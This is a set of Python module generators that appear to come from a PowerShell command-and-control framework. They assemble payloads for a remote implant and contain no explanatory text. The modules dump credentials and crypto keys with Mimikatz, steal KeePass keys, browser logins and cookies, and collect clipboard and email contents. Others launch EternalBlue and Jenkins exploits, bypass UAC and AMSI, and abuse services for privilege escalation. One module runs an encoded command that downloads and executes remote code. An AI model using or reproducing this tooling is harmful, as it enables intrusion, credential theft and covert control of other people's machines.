def generate(self, obfuscate=False, obfuscationCommand=""): username = self.options['Username']['Value'] password = self.options['Password']['Value'] instance = self.options['Instance']['Value'] check_all = self.options['CheckAll']['Value'] # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Get-SQLServerInfo.ps1" script = "" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: with open(moduleSource, 'r') as source: script = source.read() except: print(helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" scriptEnd = "" if check_all: ModuleSource = self.mainMenu.installPath + "data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) ModuleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: with open(ModuleSource, 'r') as auxSource: auxScript = auxSource.read() script += " " + auxScript except: print(helpers.color("[!] Could not read additional module source path at: " + str(ModuleSource))) scriptEnd = " Get-SQLInstanceDomain " if username != "": scriptEnd += " -Username "+username if password != "": scriptEnd += " -Password "+password scriptEnd += " | " scriptEnd += " Get-SQLServerInfo" if username != "": scriptEnd += " -Username "+username if password != "": scriptEnd += " -Password "+password if instance != "" and not check_all: scriptEnd += " -Instance "+instance scriptEnd = helpers.keyword_obfuscation(scriptEnd) scriptEnd = helpers.keyword_obfuscation(scriptEnd) if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): moduleName = self.info["Name"] # read in the common powerup.ps1 module source code moduleSource = self.mainMenu.installPath + "/data/module_source/trollsploit/Get-RickAstley.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print(helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" script = f.read() f.close() scriptEnd = moduleName + " " scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-ClipboardContents.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print(helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Get-ClipboardContents" for option, values in self.options.items(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print( helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode # add in the key dumping command scriptEnd = """Invoke-Mimikatz -Command 'crypto::capi privilege::debug crypto::cng "crypto::keys /export"' """ if obfuscate: scriptEnd = helpers.obfuscate( psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/management/Set-MacAttribute.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print(helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "\nSet-MacAttribute" for option,values in self.options.items(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\"" scriptEnd += "| Out-String" if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): computername = self.options['ComputerName']['Value'] print(helpers.color("[+] Querying: " + str(computername))) # if you're reading in a large, external script that might be updates, # use the pattern below # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-WinUpdates.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print(helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = " Get-WinUpdates" scriptEnd += " -ComputerName "+computername if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Invoke-MS16135.ps1" try: f = open(moduleSource, 'r') except: print(helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode # generate the launcher code without base64 encoding l = self.mainMenu.stagers.stagers['multi/launcher'] l.options['Listener']['Value'] = self.options['Listener']['Value'] l.options['UserAgent']['Value'] = self.options['UserAgent']['Value'] l.options['Proxy']['Value'] = self.options['Proxy']['Value'] l.options['ProxyCreds']['Value'] = self.options['ProxyCreds']['Value'] l.options['Base64']['Value'] = 'False' launcherCode = l.generate() # need to escape characters launcherCode = launcherCode.replace("`", "``").replace("$", "`$").replace("\"","'") script += 'Invoke-MS16135 -Command "' + launcherCode + '"' script += ';"`nInvoke-MS16135 completed."' if obfuscate: script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print(helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode # build the custom command with whatever options we want command = "misc::memssp" # base64 encode the command to pass to Invoke-Mimikatz scriptEnd = "Invoke-Mimikatz -Command '\"" + command + "\"';" scriptEnd += '"memssp installed, check C:\Windows\System32\mimisla.log for logon events."' if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): # extract all of our options listenerName = self.options['Listener']['Value'] if listenerName not in self.mainMenu.listeners.activeListeners: print( helpers.color("[!] Listener '%s' doesn't exist!" % (listenerName))) return '' activeListener = self.mainMenu.listeners.activeListeners[listenerName] listenerOptions = activeListener['options'] script = self.mainMenu.listeners.loadedListeners[ activeListener['moduleName']].generate_comms( listenerOptions=listenerOptions, language='powershell') # signal the existing listener that we're switching listeners, and the new comms code script = "Send-Message -Packets $(Encode-Packet -Type 130 -Data '%s');\n%s" % ( listenerName, script) if obfuscate: script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print( helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode # set the purge command scriptEnd = "Invoke-Mimikatz -Command '\"kerberos::purge\"'" if obfuscate: scriptEnd = helpers.obfuscate( self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print( helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode # build the custom command with whatever options we want scriptEnd = "Invoke-Mimikatz -Command " scriptEnd += "'\"" + self.options['Command']['Value'] + "\"'" if obfuscate: scriptEnd = helpers.obfuscate( self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): maxSize = self.options['MaxSize']['Value'] traceFile = self.options['TraceFile']['Value'] persistent = self.options['Persistent']['Value'] stopTrace = self.options['StopTrace']['Value'] if stopTrace.lower() == "true": script = "netsh trace stop" else: script = "netsh trace start capture=yes traceFile=%s" % (traceFile) if maxSize != "": script += " maxSize=%s" % (maxSize) if persistent != "": script += " persistent=yes" # Get the random function name generated at install and patch the stager with the proper function name if obfuscate: script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): moduleName = self.info["Name"] # read in the common powerup.ps1 module source code moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/PrivescCheck.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print( helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() # # get just the code needed for the specified function # script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName) script = moduleCode scriptEnd = "Invoke-PrivescCheck" if obfuscate: scriptEnd = helpers.obfuscate( self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): moduleName = self.info["Name"] # read in the common powerview.ps1 module source code moduleSource = self.mainMenu.installPath + "/data/module_source/collection/vaults/KeeThief.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print(helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() # get just the code needed for the specified function script = moduleCode scriptEnd = "\nGet-KeePassDatabaseKey " scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/exploitation/Exploit-EternalBlue.ps1" try: f = open(moduleSource, 'r') except: print( helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode script += "\nInvoke-EternalBlue " for option, values in self.options.items(): if values['Value'] and values['Value'] != '': if option.lower() == "shellcode": # transform the shellcode to the correct format script += " -" + str(option) + " @(" + str( values['Value']) + ")" else: script += " -" + str(option) + " " + str(values['Value']) script += "; 'Exploit complete'" script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/dumpCredStore.ps1" scriptCmd = "Invoke-X" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print( helpers.color( "[!] Unable to open script at the configured path: " + str(scriptPath))) return "" script = f.read() f.close() scriptEnd = "\n%s" % (scriptCmd) if obfuscate: scriptEnd = helpers.obfuscate( self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): moduleName = self.info["Name"] folderName = self.options['FolderName']['Value'] maxEmails = self.options['MaxEmails']['Value'] # read in the common powerview.ps1 module source code moduleSource = self.mainMenu.installPath + "/data/module_source/management/MailRaider.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print(helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode + "\n" scriptEnd = "Get-OutlookFolder -Name '%s' | Get-EmailItems -MaxEmails %s" %(folderName, maxEmails) scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): scriptPath = self.options['ScriptPath']['Value'] scriptCmd = self.options['ScriptCmd']['Value'] script = '' if (scriptPath != ''): try: f = open(scriptPath, 'r') except: print( helpers.color( "[!] Could not read script source path at: " + str(scriptPath))) return "" script = f.read() f.close() script += '\n' script += "%s" % (scriptCmd) if obfuscate: script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): moduleName = self.info["Name"] # read in the common powerup.ps1 module source code moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/PowerUp.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print( helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() # # get just the code needed for the specified function # script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName) script = moduleCode # extract all of our options serviceName = self.options['ServiceName']['Value'] # generate the .bat launcher code to write out to the specified location l = self.mainMenu.stagers.stagers['windows/launcher_bat'] l.options['Listener']['Value'] = self.options['Listener']['Value'] l.options['UserAgent']['Value'] = self.options['UserAgent']['Value'] l.options['Proxy']['Value'] = self.options['Proxy']['Value'] l.options['ProxyCreds']['Value'] = self.options['ProxyCreds']['Value'] l.options['Delete']['Value'] = "True" launcherCode = l.generate() # PowerShell code to write the launcher.bat out scriptEnd = ";$tempLoc = \"$env:temp\\debug.bat\"" scriptEnd += "\n$batCode = @\"\n" + launcherCode + "\"@\n" scriptEnd += "$batCode | Out-File -Encoding ASCII $tempLoc ;\n" scriptEnd += "\"Launcher bat written to $tempLoc `n\";\n" if launcherCode == "": print(helpers.color("[!] Error in launcher .bat generation.")) return "" scriptEnd += "Invoke-ServiceAbuse -ServiceName \"" + serviceName + "\" -Command \"C:\\Windows\\System32\\cmd.exe /C `\"$env:Temp\\debug.bat`\"\"" if obfuscate: scriptEnd = helpers.obfuscate( self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): script = """ function Get-SystemDNSServer { <# .Synopsis Enumerates the DNS Servers used by a system Part of Posh-SecMod (https://github.com/darkoperator/Posh-SecMod/) Author: darkoperator .DESCRIPTION Enumerates the DNS Servers used by a system returning an IP Address .Net object for each. .EXAMPLE C:\> Get-SystemDNSServer Address : 16885952 AddressFamily : InterNetwork ScopeId : IsIPv6Multicast : False IsIPv6LinkLocal : False IsIPv6SiteLocal : False IsIPv6Teredo : False IsIPv4MappedToIPv6 : False IPAddressToString : 192.168.1.1 #> $DNSServerAddresses = @() $interfaces = [System.Net.NetworkInformation.NetworkInterface]::GetAllNetworkInterfaces() foreach($interface in $interfaces) { if($interface.OperationalStatus -eq "Up") { $DNSConfig = $interface.GetIPProperties().DnsAddresses if (!$DNSConfig.IsIPv6SiteLocal) { $DNSServerAddresses += $DNSConfig } } } $DNSServerAddresses } Get-SystemDNSServer""" for option, values in self.options.items(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch script += " -" + str(option) else: script += " -" + str(option) + " " + str( values['Value']) if obfuscate: script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Invoke-Portscan.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print( helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Invoke-PortScan -noProgressMeter -f" for option, values in self.options.items(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str( values['Value']) scriptEnd += " | ? {$_.alive}| Select-Object HostName,@{name='OpenPorts';expression={$_.openPorts -join ','}} | ft -wrap | Out-String | %{$_ + \"`n\"}" scriptEnd = helpers.keyword_obfuscation(scriptEnd) if obfuscate: scriptEnd = helpers.obfuscate( self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): # Set booleans to false by default Obfuscate = False AMSIBypass = False AMSIBypass2 = False # extract all of our options listenerName = self.options['Listener']['Value'] userAgent = self.options['UserAgent']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] sysWow64 = self.options['SysWow64']['Value'] # staging options if (self.options['Obfuscate']['Value']).lower() == 'true': Obfuscate = True ObfuscateCommand = self.options['ObfuscateCommand']['Value'] if (self.options['AMSIBypass']['Value']).lower() == 'true': AMSIBypass = True if (self.options['AMSIBypass2']['Value']).lower() == 'true': AMSIBypass2 = True # generate the launcher script launcher = self.mainMenu.stagers.generate_launcher( listenerName, language='powershell', encode=True, obfuscate=Obfuscate, obfuscationCommand=ObfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, AMSIBypass=AMSIBypass, AMSIBypass2=AMSIBypass2) if launcher == "": print(helpers.color("[!] Error in launcher command generation.")) return "" else: # transform the backdoor into something launched by powershell.exe # so it survives the agent exiting if sysWow64.lower() == "true": stagerCode = "$Env:SystemRoot\\SysWow64\\WindowsPowershell\\v1.0\\" + launcher else: stagerCode = "$Env:SystemRoot\\System32\\WindowsPowershell\\v1.0\\" + launcher parts = stagerCode.split(" ") script = "Start-Process -NoNewWindow -FilePath \"%s\" -ArgumentList '%s'; 'Agent spawned to %s'" % ( parts[0], " ".join(parts[1:]), listenerName) if obfuscate: script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): # Set booleans to false by default Obfuscate = False AMSIBypass = False AMSIBypass2 = False # extract all of our options listenerName = self.options['Listener']['Value'] userAgent = self.options['UserAgent']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] if (self.options['Obfuscate']['Value']).lower() == 'true': Obfuscate = True ObfuscateCommand = self.options['ObfuscateCommand']['Value'] if (self.options['AMSIBypass']['Value']).lower() == 'true': AMSIBypass = True if (self.options['AMSIBypass2']['Value']).lower() == 'true': AMSIBypass2 = True # generate the launcher code launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, obfuscate=Obfuscate, obfuscationCommand=ObfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, AMSIBypass=AMSIBypass, AMSIBypass2=AMSIBypass2) if launcher == "": print(helpers.color("[!] Error in launcher command generation.")) return "" else: #Cmd = launcher print(helpers.color("Agent Launcher code: "+ launcher)) # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/exploitation/Exploit-Jenkins.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print(helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "\nExploit-Jenkins" scriptEnd += " -Rhost "+str(self.options['Rhost']['Value']) scriptEnd += " -Port "+str(self.options['Port']['Value']) scriptEnd += " -Cmd \"" + launcher + "\"" if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): # Set booleans to false by default Obfuscate = False AMSIBypass = False AMSIBypass2 = False listenerName = self.options['Listener']['Value'] # staging options userAgent = self.options['UserAgent']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] if (self.options['Obfuscate']['Value']).lower() == 'true': Obfuscate = True ObfuscateCommand = self.options['ObfuscateCommand']['Value'] if (self.options['AMSIBypass']['Value']).lower() == 'true': AMSIBypass = True if (self.options['AMSIBypass2']['Value']).lower() == 'true': AMSIBypass2 = True # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Invoke-BypassUAC.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print(helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode if not self.mainMenu.listeners.is_listener_valid(listenerName): # not a valid listener, return nothing for the script print(helpers.color("[!] Invalid listener: " + listenerName)) return "" else: # generate the PowerShell one-liner with all of the proper options set launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, obfuscate=Obfuscate, obfuscationCommand=ObfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, AMSIBypass=AMSIBypass, AMSIBypass2=AMSIBypass2) if launcher == "": print(helpers.color("[!] Error in launcher generation.")) return "" else: scriptEnd = "Invoke-BypassUAC -Command \"%s\"" % (launcher) if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): script = """ function Invoke-DropboxUpload { Param( [Parameter(Mandatory=$true)] [string]$SourceFilePath, [Parameter(Mandatory=$true)] [string]$TargetFilePath, [Parameter(mandatory=$true)] [string]$ApiKey ) $url = "https://content.dropboxapi.com/2/files/upload" $file = [IO.File]::ReadAllBytes($SourceFilePath) [net.httpWebRequest] $req = [net.webRequest]::create($url) $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $ApiKey $req.method = "POST" $req.Headers.Add("Authorization", $authorization) $req.Headers.Add("Dropbox-API-Arg", $arg) $req.ContentType = 'application/octet-stream' $req.ContentLength = $file.length $req.TimeOut = 50000 $req.KeepAlive = $true $req.Headers.Add("Keep-Alive: 300"); $reqst = $req.getRequestStream() $reqst.write($file, 0, $file.length) $reqst.flush() $reqst.close() [net.httpWebResponse] $res = $req.getResponse() $resst = $res.getResponseStream() $sr = new-object IO.StreamReader($resst) $result = $sr.ReadToEnd() $result $res.close() } Invoke-DropboxUpload """ # Add any arguments to the end execution of the script for option, values in self.options.items(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch script += " -" + str(option) else: script += " -" + str(option) + " " + str( values['Value']) script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): # if you're reading in a large, external script that might be updates, # use the pattern below # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-SharpChromium.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print( helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = " Get-SharpChromium" #check type if self.options['Type']['Value'].lower() not in [ 'all', 'logins', 'history', 'cookies' ]: print( helpers.color( "[!] Invalid value of Type, use default value: all")) self.options['Type']['Value'] = 'all' scriptEnd += " -Type " + self.options['Type']['Value'] #check domain if self.options['Domains']['Value'].lower() != '': if self.options['Type']['Value'].lower() != 'cookies': print( helpers.color( "[!] Domains can only be used with Type cookies")) else: scriptEnd += " -Domains (" for domain in self.options['Domains']['Value'].split(','): scriptEnd += "'" + domain + "'," scriptEnd = scriptEnd[:-1] scriptEnd += ")" if obfuscate: scriptEnd = helpers.obfuscate( self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd script = helpers.keyword_obfuscation(script) return script
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""): """ Generate the full agent code needed for communications with this listener. """ if not language: print(helpers.color('[!] listeners/http_com generate_agent(): no language specified!')) return None language = language.lower() delay = listenerOptions['DefaultDelay']['Value'] jitter = listenerOptions['DefaultJitter']['Value'] profile = listenerOptions['DefaultProfile']['Value'] lostLimit = listenerOptions['DefaultLostLimit']['Value'] killDate = listenerOptions['KillDate']['Value'] b64DefaultResponse = base64.b64encode(self.default_response().encode('UTF-8')) if language == 'powershell': f = open(self.mainMenu.installPath + "./data/agent/agent.ps1") code = f.read() f.close() # Get the random function name generated at install and patch the stager with the proper function name conn = self.get_db_connection() self.lock.acquire() code = helpers.keyword_obfuscation(code) self.lock.release() # patch in the comms methods commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language) code = code.replace('REPLACE_COMMS', commsCode) # strip out comments and blank lines code = helpers.strip_powershell_comments(code) # patch in the delay, jitter, lost limit, and comms profile code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay)) code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter)) code = code.replace( '$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"") code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit)) # code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+b64DefaultResponse+'"') code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "' + str(b64DefaultResponse) + '"') # patch in the killDate and workingHours if they're specified if killDate != "": code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',") if obfuscate: code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand) return code else: print(helpers.color( "[!] listeners/http_com generate_agent(): invalid language specification, only 'powershell' is currently supported for this module."))
def generate(self, obfuscate=False, obfuscationCommand=""): # iex (New-Object Net.WebClient).DownloadString("http://bit.ly/e0Mw9w") script = "$Null = Start-Process -WindowStyle Maximized -FilePath \"C:\Windows\System32\WindowsPowerShell\\v1.0\powershell.exe\" -ArgumentList \"-enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBpAHQALgBsAHkALwBlADAATQB3ADkAdwAiACkA\"; 'Client Rick-Asciied!'" if obfuscate: script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) script = helpers.keyword_obfuscation(script) return script
